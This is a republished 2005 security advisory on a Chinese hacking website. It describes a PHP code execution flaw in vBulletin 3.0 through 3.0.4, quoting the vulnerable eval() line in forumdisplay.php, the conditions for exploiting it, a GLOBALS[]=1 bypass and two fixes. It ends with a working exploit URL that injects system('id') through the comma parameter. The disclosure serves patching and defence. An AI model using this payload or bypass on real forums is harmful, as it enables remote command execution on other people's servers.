 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| vbulletin 3.0.x PHP代码执行漏洞 | |||||
作者:未知 文章来源:www.securityfocus.com 点击数: 更新时间:2005-2-16  |
|||||
|
Vulnerable Systems: ---------------- vBulletin version 3.0 up to and including version 3.0.4 Immune systems: ---------------- vBulletin version 3.0.5 vBulletin version 3.0.6 Vulnerable code in forumdisplay.php : ############################################################# if ($vboptions['showforumusers']) { . . . . if ($bbuserinfo['userid']) { . . . . $comma = ', '; } . . . . while ($loggedin = $DB_site->fetch_array($forumusers)) { . . . eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln) $comma = ', '; . . } . . } ############################################################# Conditions: ---------------- 1st condition : $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vbulletin options. 2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest . 3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum. 4th condition : magic_quotes_gpc must be OFF SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in init.php by secret array GLOBALS[]=1 ;))) Solutions: ---------------- * Disable showforumusers in vbulletin options . * add the next line before if ($vboptions['showforumusers']) $comma = ''; Exploit: ---------------- example : http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
